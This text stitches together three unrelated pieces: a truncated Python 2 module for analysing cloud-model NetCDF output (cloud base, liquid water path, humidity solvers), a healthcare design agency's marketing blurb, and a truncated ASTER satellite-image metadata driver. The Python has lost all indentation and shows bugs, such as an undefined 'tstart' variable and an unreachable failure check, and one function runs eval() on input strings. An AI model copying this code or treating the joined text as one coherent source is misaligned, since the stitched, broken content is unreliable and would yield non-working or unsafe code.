# Outputs: mean positive updraft velocity and cloud droplet number concentrations (mean and weighted with velocity) at the cloud base
return wpos,w2pos,cdnc_p,cdnc_wp,n
def get_netcdf_variable(fname,var_name,start_time,end_time=-10000.,ttol=3600.,start_offset=0,end_offset=0):
# Function for extracting data from a NetCDF file based on the given time value (or range).
#
# Inputs:
# fname Complete file path and name
# var_name NetCDF variable name
# start_time Target or start (when end_time is specified) time value
# Optional inputs
# end_time Optional end time value
# ttol Time tolelance (s) for finding averaging window
# start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
# end_offset -||- end index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# lmax=get_netcdf_variable(file,'lmax',3*3600,ttol=10)
# lmax=get_netcdf_variable(file,'lmax',2.5*3600,3.5*3600,ttol=10.,start_offset=1)
import os
import numpy
import netCDF4 as netcdf
#
# File must exist
if not os.path.lexists(fname): raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif var_name not in ncid.variables:
raise RuntimeError('Variable '+var_name+' not found from '+fname+'!')
elif 'time' not in ncid.variables[var_name].dimensions:
raise RuntimeError('Time is not a dimension for '+var_name+' (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Find the correct time value
i=0
if end_time>-9999.:
# Time from start_time to end_time (closests matching start and end time values)
ind_start=0
ind_end=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind_start]-start_time): ind_start=i
if abs(tt-end_time)<abs(times[ind_end]-end_time): ind_end=i
i+=1
#
if abs(times[ind_start]-start_time)>ttol or abs(times[ind_end]-end_time)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return -999.
#
# Apply offset (typically the first point is ignored
ind_start+=start_offset
ind_end+=end_offset
if ind_start<0 or ind_start>ind_end or ind_end>=len(times):
print 'Invalid data range for '+fname+'!'
return -999.
#
# Average over time dimension
ind=ncid.variables[var_name].dimensions.index('time')
#
out=numpy.mean( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
# Could add standard deviations?
#out_std = numpy.std( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
else:
# Single time value (closest match)
ind=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind]-start_time): ind=i
i=i+1
#
if abs(times[ind]-tstart)>ttol:
print 'Matching time not found from '+fname+'!'
return -999.
#
# Apply offset (typically the first point is ignored
ind+=start_offset
if ind<0 or ind>=len(times):
print 'Invalid index for '+fname+'!'
return -999.
#
out=ncid.variables[var_name][ind,]
#
# Close file
ncid.close()
return out
def GetEmu2Vars(path):
# Function calculates LES output variables for emulator v2.0 as defined in the ECLAIR proof-of-concept document
# https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
#
# Inputs:
# path Complete path the root data
# Outputs:
# A 2D array of values as described below
#
# Example:
# path='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/'
# data=GetEmu2Vars(path)
#
import os
#
# Time window
tstart=2.5*3600
tend=3.5*3600
#
if path.endswith('/'):
fmt='emul%03u/emul%03u'
else:
fmt='/emul%03u/emul%03u'
#
# Examine the data files
out=[]
i=1
while True:
# Data must exist
if not os.path.lexists( (path+fmt+'.nc')%(i,i) ) and not os.path.lexists( (path+fmt+'.ts.nc')%(i,i) ):
if i==1:
raise RuntimeError('Data not found from '+path+'!')
else:
break
#
# Emulator v2.0 variables
# - Tolerance for the start and end times is +/- 10 s
# - No need to ignore the first point when averaging instantaneous variables (rain processes and w calculated form 4D data,)
#
# Data file
file=(path+fmt+'.ts.nc')%(i,i)
# 1a) Rain water loss (evaporation + surface precipitation)
# Change in column rain water due to condensation (kg/m^2/s)
cond=get_netcdf_variable(file,'cond_rr',tstart,tend,ttol=10.)
# Change in column rain water due to sedimentation (kg/m^2/s)
sedi=get_netcdf_variable(file,'sedi_rr',tstart,tend,ttol=10.)
#
# 1b) Rain water production (not including divergence - with that the total production is the same as total loss)
# Change in column rain water due to coagulation (kg/m^2/s)
coag=get_netcdf_variable(file,'coag_rr',tstart,tend,ttol=10.)
# Change in column rain water due to autoconversion (kg/m^2/s)
auto=get_netcdf_variable(file,'auto_rr',tstart,tend,ttol=10.)
# Change in column rain water due to diagnostics (kg/m^2/s)
diag=get_netcdf_variable(file,'diag_rr',tstart,tend,ttol=10.)
#
# 2) Precipitation statistics (ignore the first point, which is an everage from the previous time period)
# Surface precipitation rate (W/m^2)
prcp=get_netcdf_variable(file,'prcp',tstart,tend,ttol=10.,start_offset=1)
# 1 W = J/s, which can be converted to mass flux by using latent heat of water (2.5e+6 J/kg)
prcp/=2.5e6 # kg/m^2/s
#
# 3) Cloud base positive updraft velocity (m/s)
file_4d=(path+fmt+'.nc') % (i,i)
wpos,w2pos,cdnc_p,cdnc_wp,n = get_netcdf_updraft(file_4d,tstart,tend,ttol=10.)
#
out.append([i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n])
#
if i==1: print 'id cond sedi coag auto diag prcp wpos w2pos cdnc_p cdnc_wp n'
print ('%2g %8.3e %8.3e %8.3e %8.3e %8.3e %8.3e %6.4f %6.4f %7.3e %7.3e %7g')%(i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n)
#
i+=1
#
# Output lines are: id, cond, sedi, coag, auto, diag, prcp, wpos, w2pos, cdnc_p, cdnc_wp, n
return out
def extract_write_data(fname_template,specs,name_out='',nmax=9999,skip_errs=False):
# Extract and process data from one or more NetCDF files, and write it to a text file (optional)
#
# Inputs:
# fname_template File name template with complete path
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
# specs List of variables including slizing and numpy operations
# name_out Output file name (optional)
# nmax Maximum number of files (optional)
# skip_errs Don't stop on errors - needed when complete data set is not available (saves just NaN)
#
# Examples:
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
# specs=['cfrac[10]','wmax[10]','lwp_bar[10]']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
# specs=['cfrac']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ps.nc'
# specs=['numpy.amax(l[10,:])']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.nc'
# specs=['numpy.amax(numpy.amax(numpy.amax(l[2,:],axis=0),axis=0),axis=0)']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
import os
import netCDF4 as netcdf
import numpy
import sys
#
# Function for converting command line commands to NetCDF format
def interpret_fun(cmd):
# Interpret function call, e.g. 'numpy.amax(l[89,:])': just replace variable name x with "ncid.variables['x']",
# e.g. 'numpy.amax(l[2,100,100,:])', numpy.amax(l[89,:])',numpy.amax(l)' or 'numpy.amax(P_Rwca,axis=0)'
# Now also function calls like "thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]" are accepted!
frst=-1
lst=-1
i=0
for tt in cmd:
if (tt=='[' or tt==')' or tt==',') and lst==-1:
# e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l)', 'numpy.amax(P_Rwca,axis=0)' or thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]"
lst=i
if frst==0:
fun='ncid.variables[\''+cmd[frst:lst]+'\']'+cmd[lst:]
else:
fun=cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
return fun
elif tt=='(' or i==0:
frst=i
i+=1
# No solution
return cmd
#
# The old version
frst=-1
lst=-1
i=0
for tt in cmd:
if (tt=='[' or tt==')' or tt==',') and lst==-1:
# e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l)' or 'numpy.amax(P_Rwca,axis=0)'
lst=i
elif tt=='(':
frst=i
i+=1
# Return complete command as fun
fun=cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
return fun
#
#
# Any '%' in file name template will be replaced by counter i=1,2,3,...
n=fname_template.count('%')
if n==0: nmax=1 # Template as is
#
# Output to text file
if len(name_out): fid_out=open(name_out,'w')
#
nerr=0
files=0 # Count files
values=0 # Count values extracted
out=[] # Complete output
for i in range(1,nmax):
# File name with full path
if n==0:
file_name=fname_template
elif n==1:
file_name=fname_template % (i)
elif n==2:
file_name=fname_template % (i,i)
elif n==3:
file_name=fname_template % (i,i,i)
else:
# No more than three?
file_name=fname_template % (i,i,i,i)
#
ncid=0
if not os.path.isfile(file_name):
if i==1 and n>0: print file_name+' not found!'
if not skip_errs or i>90:
break
else:
# Ignore missing file (<90)
ncid=-999
nerr+=1
msg=file_name+' not found!'
#
#
#row=[] # one row
#for nam in specs:
# row.append(obj)
#
#out.append(row)
#
# Save data
#if len(name_out):
# # Save variables as space separated strings
# if not hasattr(obj, '__iter__'):
# # Scalar
# fid_out.write( str(obj)+" " )
# values+=1
# else:
# # Vector
# for val in obj:
# fid_out.write( str(val)+" " )
# values+=1
#
#continue
#
# Open input file
if ncid==0: ncid = netcdf.Dataset(file_name,'r')
#
# Outputs
row=[] # one row
for nam in specs:
# Interpret command
if ncid<0:
# File not found
obj = float('nan') # Scalar works quite often
elif '(' in nam:
# There is a call to a function
fun=interpret_fun(nam)
try:
obj =eval( fun )
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
elif '[' in nam:
# Selected data range
name=nam[:nam.index('[')]
ind=nam[nam.index('['):]
try:
obj =eval( 'ncid.variables[\''+name+'\']'+ind )
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
else:
# Data as is
try:
obj = ncid.variables[nam][:]
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
#
# Append data
row.append(obj)
#
# Save data
if len(name_out):
# Save variables as space separated strings
if not hasattr(obj, '__iter__'):
# Scalar
fid_out.write( str(obj)+" " )
values+=1
else:
# Vector/matrix
for val in obj:
if not hasattr(val, '__iter__'):
# Scalar (1D vector)
fid_out.write( str(val)+" " )
values+=1
else:
# Vector (2D matrix)
for val2 in val:
fid_out.write( str(val2)+" " )
values+=1
#
# New line
if len(name_out): fid_out.write( "\r\n" )
#
out.append(row)
#
if ncid>0: ncid.close()
files+=1
#
if len(name_out):
fid_out.close()
print str(files)+' files examined, '+str(values)+' values saved to '+name_out
if nerr>0: print ' '+str(nerr)+' error(s) ignored: ',msg
#
# Return the data
return out
#
# LES inputs and outputs
#
def calc_cloud_base(p_surf,theta,rw):
# Calulate cloud base heigh when liquid water potential temperature (theta [K]) and water
# vapor mixing ratio (rw [kg/kg]) are constants. Surface pressure p_surf is given in Pa.
# For more information, see "lifted condensation level" (LCL).
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
#
# Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while RH<100 and z<10000:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rw,tavg,press)
if RH>100: break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rw)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud
if RH<100: return -999
#
# Return cloud base altitude
return z
def calc_lwc_altitude(p_surf,theta,rw,zz):
# Calculate cloud water mixing ratio at a given altitude z (m) when liquid water potential
# temperature (theta [k]) and water vapor mixing ratio (rw [kg/kg]) are constants.
# Surface pressure p_surf is given in Pa.
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# a) Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while z<zz:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rw,tavg,press)
if RH>100: break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rw)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud or cloud water
if RH<100: return 0.0
#
# b) Integrate up to given altitude
while z<zz:
# From z to z+dz
z+=dz
#
# Moist adiabatic lapse rate
q_sat=calc_sat_mixr(press,tavg)
tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
#
# New pressure
xsi=(1+ep2*q_sat)
press-=g*dz*press/(R*tavg*xsi)
#
# Return cloud water mixing ratio = totol - vapor
return rw-q_sat
def solve_rw(p_surf,theta,lwc,zz):
# Solve total water mixing ratio (rw, kg/kg) from surface pressure (p_surf, Pa), liquid water potential
# temperature (theta, K) and liquid water mixing ratio (lwc) at altitude zz (m)
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# Mimimum water vapor mixing ratio is at least lwc
q_min=lwc
#
# Maximum water vapor mixing ratio is unlimited, but should be smaller
# than that for a cloud which base is at surface
t_surf=theta*(p_surf/p00)**rcp
q_max=calc_sat_mixr(p_surf,t_surf)
#
k=0
while k<100:
q_new=(q_min+q_max)/2
lwc_calc=calc_lwc_altitude(p_surf,theta,q_new,zz)
#
if abs(lwc-lwc_calc)<1e-7:
break
elif lwc<lwc_calc:
q_max=q_new
else:
q_min=q_new
k+=1
# Failed
if k==50: return -999
#
return q_new
def calc_lwp(p_surf,theta,pblh,rt):
# Calculate liquid water path (kg/m^2) when boundary layer liquid water potential temperature (theta [K]) and total
# water mixing ratio (rt [kg/kg]) are constants from surface (p_surf, Pa) up to boundary layer top (pblh, Pa or km).
# In addition to the liquid water path, function returns cloud base and top heights (m) and the maximum (or cloud top)
# liquid water mixing ratio (kg/kg).
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# It is assumed that a pblh value smaller than 10 is in kilometers and a value larger than that is Pa
if pblh<10.0:
z_top=pblh*1000. # from km to m (above surface)
p_top=0.
else:
z_top=10e3
p_top=p_surf-pblh # Pa (above surface)
#
# Outputs
lwp=0. # Liquid water path (g/m^2)
zb=-999. # Cloud base height (m)
zc=-999. # Cloud top height (m)
clw_max=0. # Maximum cloud liquid water
#
# a) Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while press>p_top and z<=z_top:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rt,tavg,press)
if RH>100:
zb=z
break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rt)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud or cloud water
if RH<=100: return lwp,zb,zc,clw_max
zb=z
#
# b) Integrate up to the given altitude
while press>p_top and z<=z_top:
# From z to z+dz
z+=dz
#
# Moist adiabatic lapse rate
#q_sat=calc_sat_mixr(press,tavg)
q_sat=calc_sat_mixr(press,tavg)
tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
#
# New pressure
xsi=(1+ep2*q_sat)
press-=g*dz*press/(R*tavg*xsi)
#
# Cloud water mixing ratio = totol - vapor
rc=max(0.,rt-q_sat)
# LWP integral
lwp+=rc*dz*press/(R*tavg*xsi)
#
# Cloud top height
zc=z
clw_max=rc
#
# Return LWP (kg/m^2) and boundary layer height (m)
return lwp,zb,zc,clw_max
def solve_rw_lwp(p_surf,theta,lwp,pblh,debug=False):
# Solve boundary layer total water mixing ratio (kg/kg) from liquid water potential temperature (theta [K]),
# liquid water path (lwp, kg/m^2) and boundary layer height (pblh, Pa or km) for an adiabatic cloud.
# For example, solve_rw_lwp(101780.,293.,100e-3,20000.) would return 0.00723684088331 [kg/kg].
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
p00=1.0e+05
#
# LWP tolerance: 0.1 % but not more than 0.1e-3 kg/m^2 and not less than 1e-3 kg/kg
tol=min(max(0.001*lwp,0.1e-3),1e-3)
#
# Surface temperature (dry, i.e. no fog)
t_surf=theta*(p_surf/p00)**rcp
#
# The highest LWP when RH=100% at the surface (no fog)
rw_max= calc_sat_mixr(p_surf,t_surf)
lwp_max,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_max)
# No fog cases
if lwp_max<lwp:
if debug: print ('Too high LWP (%5.1f g/m2), the maximum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)')%(lwp*1e3, lwp_max*1e3,theta,pblh/100.)
return -999.
#
# The lowest LWP when RH=0% at the surface
rw_min=0.
lwp_min,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_min)
if lwp_min>lwp:
if debug: print ('Too low LWP (%5.1f g/m2), the minimum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)')%(lwp*1e3, lwp_max*1e3,theta,pblh/100.)
return -999.
#
k=0
while k<100:
rw_new=(rw_min+rw_max)*0.5
lwp_new,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_new)
#
if abs(lwp-lwp_new)<tol or abs(rw_max-rw_min)<0.001e-3:
return rw_new
elif lwp<lwp_new:
rw_max=rw_new
else:
rw_min=rw_new
k+=1
#
# Failed
if debug: print ('Iteration failed: current LWP=%5.1f, target LWP=%5.1f')%(lwp_new*1e3,lwp*1e3)
return -999.
def solve_q_inv_RH(press,tpot,q,max_RH):
# Function for adjusting total water mixing ratio so that the calculated RH will be no more
# than the given RH limit. This function can be used to increase humidity inversion so that RH
# above cloud is less than 100%. For this purpose the typical inputs are:
# press [Pa] = p_surf - pblh
# tpot [K] = tpot_pbl + tpot_inv
# q [kg/kg] = q_pbl - q_inv
# RH [%] = 98.
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
p00=1.0e+05
#
# Temperature (K)
temp=tpot*(press/p00)**rcp
#
# RH (%)
rh=calc_rh(q,temp,press)
#
# All done if RH is not exceeding the RH limit
if rh<=max_RH: return q, rh, rh
#
# Solve q so that RH=max_RH
q_min=0.
q_max=q
k=0
while k<200:
q_new=0.5*(q_min+q_max)
rh_new=calc_rh(q_new,temp,press)
#
if abs(rh_new-max_RH)<0.001:
return q_new, rh_new, rh
elif rh_new>max_RH:
q_max=q_new
else:
q_min=q_new
k+=1
#
# Failed
print 'Failed to solve water vapor mixing ratio from given RH!'
return -999.,-999., rh
#
#
#
# ================ Helper functions ================
#
def ls_fit(xx,yy):
# Simple linear least squares fit: y=a+b*x
import numpy
#
# Ignore NaN's
x=[]; y=[]
i=0
for val in xx:
if not (numpy.isnan(xx[i]) or numpy.isnan(yy[i])):
x.append(xx[i])
y.append(yy[i])
i+=1
#
if len(x)<=1:
# Scalar
a=0.0; a_std=0.0
b=1.0; b_std=0.0
else:
# Matrix H
H = numpy.matrix( numpy.vstack([numpy.ones(len(x)),x]).T )
# LS solution
th=numpy.linalg.inv( H.T*H ) * H.T *numpy.matrix(y).T
# Outputs
a=numpy.asscalar(th[0])
b=numpy.asscalar(th[1])
# Parameter uncertainty
if len(x)>2:
# Variance
sv2=((numpy.matrix(y).T-H*th).T * (numpy.matrix(y).T-H*th) )/(len(x)-2)
std=numpy.sqrt( numpy.asscalar(sv2) * numpy.diagonal( numpy.linalg.inv( H.T*H ) ) )
# Outputs
a_std=numpy.asscalar(std[0])
b_std=numpy.asscalar(std[1])
else:
a_std=0.0
b_std=0.0
#
return a,b,a_std,b_std,
def average_scaled(x,y):
# Calculate average of x/y so that points where y=0 are ignored
import numpy
sx=0.
sx2=0.
n=0
i=0
for yy in y:
if yy>0.:
sx+=x[i]/yy
sx2+=(x[i]/yy)**2
n+=1
i+=1
#
if n==0:
return -999., -999.
elif n==1:
return sx, -999.
else:
return sx/n, numpy.sqrt( sx2/n - (sx/n)**2 )
#
# Functions from the LES model
#
def calc_psat_w(T):
# Function calculates the saturation vapor pressure (Pa) of liquid water as a function of temperature (K)
#
# thrm.f90: real function rslf(p,t)
c0=0.6105851e+03
c1=0.4440316e+02
c2=0.1430341e+01
c3=0.2641412e-01
c4=0.2995057e-03
c5=0.2031998e-05
c6=0.6936113e-08
c7=0.2564861e-11
c8=-.3704404e-13
#
x=max(-80.,T-273.16)
return c0+x*(c1+x*(c2+x*(c3+x*(c4+x*(c5+x*(c6+x*(c7+x*c8)))))))
def calc_sat_mixr(p,T):
# Function calculates saturation mixing ratio for water (kg/kg)
#
# thrm.f90: real function rslf(p,t)
#
# r=m_w//m_air
# R/Rm=287.04/461.5=.622
#
esl=calc_psat_w(T)
return .622*esl/(p-esl)
def calc_rh(rw,T,press):
# Calculate RH (%) from water vapor mixing ratio rw (r=m_w/m_air [kg/kg]), temperature (K) and pressure (Pa)
#
# r=m_w//m_air=pw/Rm/(pair/R)=pw/(p-pw)*R/Rm => pw=p*r/(R/Rm+r)
#
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # Specific gas constant for water
ep=R/Rm
#
psat=calc_psat_w(T)
return press*rw/(ep+rw)/psat*100
# When ep>>rw => RH=press*rw/(ep*psat)*100
# ================================
|
We design things for the world of healthcare communications. This could mean an identity for a charity like Heart UK, a patient campaign, a toolkit for professionals working in intensive care or an online interactive educational module for oncology nursing. We also help get these produced, get them in place on time and in budget. Whatever the project, we get a buzz from making something work and bringing our clients' ideas to life.
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Metadata driver for ASTER imagery
B{Format specifications}:
- U{http:#www.gdal.org/frmt_hdf4.html}
- U{http://asterweb.jpl.nasa.gov/documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf}
- U{http://asterweb.jpl.nasa.gov/content/03_data/04_Documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf} (inc description of GCTP projection parameters)
- U{http://lpdaac.usgs.gov/aster/ASTER_GeoRef_FINAL.pdf}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/users_guide/index.html}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/pdf/ASTER_Ref_V1.pdf}
'''
format_regex=[r'ast_l1[ab].*\.hdf$',r'pg-PR1[AB]0000-\d{10}_\d{3}_\d{3}$'] #HDF inc. ASTER
'''Regular expression list of file formats'''
#import base dataset module
import __dataset__
# import other modules (use "_" prefix to import privately)
import sys, os, re, glob, time, math, string
from metageta import utilities, geometry, spatialreferences
try:
from osgeo import gdal
from osgeo import gdalconst
from osgeo import osr
from osgeo import ogr
except ImportError:
import gdal
import gdalconst
import osr
import ogr
gdal.AllRegister()
class Dataset(__dataset__.Dataset): #Subclass of base Dataset class
def __init__(self,f=None):
if not f:f=self.fileinfo['filepath']
if f[:4]=='/vsi':raise NotImplementedError
self.filelist=glob.glob(os.path.splitext(f)[0]+'.*')
self._gdaldataset = geometry.OpenDataset(f)
self._hdf_md=self._gdaldataset.GetMetadata()
if not self._hdf_md.get('INSTRUMENTSHORTNAME')=='ASTER':
raise NotImplementedError #This error gets ignored in __init__.Open()
def __getmetadata__(self,f=None):
'''Read Metadata for ASTER HDF images as GDAL doesn't.'''
if not f:f=self.fileinfo['filepath']
hdf_sd=self._gdaldataset.GetSubDatasets()
hdf_sd= [sd for sd,sz in hdf_sd if 'ImageData' in sd]
hdf_md=self._hdf_md
#sd,sz = hdf_sd[0]
sd = hdf_sd[0]
sd=geometry.OpenDataset(sd)
nbands=len(hdf_sd)
ncols=[]
nrows=[]
nbits=[]
bands=[]
datatypes=[]
cellxy=[]
for i in range(0,len(hdf_md['PROCESSEDBANDS']), 2):
band=hdf_md['PROCESSEDBANDS'][i:i+2]
if i/2+1 <= 4:
bands.append('VNIR'+band)
cellxy.append('15')
elif i/2+1 <= 10:
bands.append('SWIR'+band)
cellxy.append('30')
else:
bands.append('TIR'+band)
cellxy.append('90')
if band.isdigit():band=str(int(band)) #Get rid of leading zero
cols,rows,bytes=map(int,hdf_md['IMAGEDATAINFORMATION%s' % band].split(','))
if bytes==1:datatypes.append('Byte')
elif bytes==2:datatypes.append('UInt16')
ncols.append(str(cols))
nrows.append(str(rows))
nbits.append(str(bytes*8))
ncols=','.join(ncols)
nrows=','.join(nrows)
nbits=','.join(nbits)
bands=','.join(bands)
datatypes=','.join(datatypes)
cellxy=','.join(cellxy)
uly,ulx=[float(xy) for xy in hdf_md['UPPERLEFT'].split(',')]
ury,urx=[float(xy) for xy in hdf_md['UPPERRIGHT'].split(',')]
lry,lrx=[float(xy) for xy in hdf_md['LOWERRIGHT'].split(',')]
lly,llx=[float(xy) for xy in hdf_md['LOWERLEFT'].split(',')]
ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
#SRS reported by GDAL is slightly dodgy, GDA94 is not recognised and doesn't set the North/South properly
#Get it anyway so we can work out if it's GDA94 based on the spheroid
srs=sd.GetGCPProjection()
src_srs=osr.SpatialReference(srs)
tgt_srs=osr.SpatialReference()
geogcs=osr.SpatialReference()
if src_srs.GetAttrValue('SPHEROID') == 'GRS 1980':geogcs.ImportFromEPSG(4283) #Assume 'GDA94'
else:geogcs.ImportFromEPSG(4326) #Assume 'WGS84'
tgt_srs.CopyGeogCSFrom(geogcs)
if hdf_md['PROCESSINGLEVELID'].upper()=='1A':
units='deg'
else:
#projparams=map(float, hdf_md['PROJECTIONPARAMETERS1'].split(','))
if hdf_md['MPMETHOD1'] == 'UTM':#Universal Transverse Mercator
if uly < 0:bNorth=False #GDAL doesn't set the North/South properly
else:bNorth=True
nZone = int(hdf_md['UTMZONECODE1'])
tgt_srs.SetUTM(nZone,bNorth)
units='m'
#Other projections not (yet?) implemented...
#elif hdf_md['MPMETHOD1'] == 'PS':#Polar Stereographic
# #dfCenterLon = ? GTCP projection params don't list cenlon/lat for PS
# dfCenterLat = ?
# dfScale = ?
# tgt_srs.SetPS(dfCenterLat,dfCenterLon,dfScale,0.0,0.0)
#elif hdf_md['MPMETHOD1'] == 'LAMCC':#Lambert Conformal Conic
# dfCenterLon = ?
# dfCenterLat = ?
# dfStdP1 = ?
# dfStdP2 = ?
# tgt_srs.SetLCC(dfStdP1,dfStdP2,dfCenterLat,dfCenterLon,0,0)
#elif hdf_md['MPMETHOD1'] == 'SOM':#Space Oblique Mercator
# dfCenterLon = ?
# dfCenterLat = ?
# srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
#elif hdf_md['MPMETHOD1'] == 'EQRECT':#Equi-Rectangular
# dfCenterLon = ?
# dfCenterLat = ?
# tgt_srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
else: #Assume Geog
units='deg'
srs=tgt_srs.ExportToWkt()
self.metadata['UL']='%s,%s' % tuple(ext[0])
self.metadata['UR']='%s,%s' % tuple(ext[1])
self.metadata['LR']='%s,%s' % tuple(ext[2])
